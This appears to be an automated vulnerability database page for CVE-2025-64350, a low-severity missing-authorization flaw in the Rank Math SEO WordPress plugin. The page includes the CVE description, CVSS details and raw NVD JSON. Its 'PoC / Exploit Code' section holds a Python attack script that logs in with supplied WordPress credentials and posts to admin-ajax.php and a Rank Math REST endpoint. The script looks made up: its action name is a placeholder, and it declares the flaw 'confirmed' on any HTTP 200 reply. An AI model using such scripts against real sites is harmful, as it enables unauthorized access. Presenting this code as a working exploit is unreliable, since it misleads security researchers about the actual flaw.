Security Vulnerability Report
中文
CVE-2025-64350 CVSS 3.8 LOW

CVE-2025-64350

Published: 2025-10-31 12:15:35
Last Modified: 2026-04-27 16:16:41

Description

Missing Authorization vulnerability in Rank Math SEO Rank Math SEO seo-by-rank-math allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rank Math SEO: from n/a through <= 1.0.252.1.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Rank Math SEO (seo-by-rank-math) <= 1.0.252.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64350 PoC - Rank Math SEO Broken Access Control # This PoC demonstrates the missing authorization vulnerability # Requires high-privilege WordPress account (Editor/Author role) import requests import sys from urllib.parse import urljoin def exploit_rankmath_auth_bypass(target_url, username, password): """ Exploit missing authorization in Rank Math SEO plugin Allows high-privilege users to access admin-only functions """ session = requests.Session() # WordPress login login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as {username}...') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings' not in response.url: print('[-] Login failed') return False print('[+] Login successful') # Exploit the broken access control # Target Rank Math SEO admin functions exploit_urls = [ '/wp-admin/admin-ajax.php', '/wp-json/rankmath/v1/settings' ] for endpoint in exploit_urls: ajax_url = urljoin(target_url, endpoint) # Construct malicious request to access admin-only functions exploit_data = { 'action': 'rank_math_exploit_action', 'route': '/settings/export', 'subaction': 'export_settings', 'format': 'json' } print(f'[*] Attempting to exploit: {ajax_url}') response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print(f'[+] Potential vulnerability confirmed at {endpoint}') print(f'[>] Response: {response.text[:500]}') return True if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python poc.py <target_url> <username> <password>') print('Example: python poc.py http://example.com editor password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_rankmath_auth_bypass(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64350", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:35.247", "lastModified": "2026-04-27T16:16:40.560", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Rank Math SEO Rank Math SEO seo-by-rank-math allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rank Math SEO: from n/a through <= 1.0.252.1."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Rank Math SEO (seo-by-rank-math) permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Rank Math SEO: desde n/a hasta menor igual que 1.0.252.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seo-by-rank-math/vulnerability/wordpress-rank-math-seo-plugin-1-0-252-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}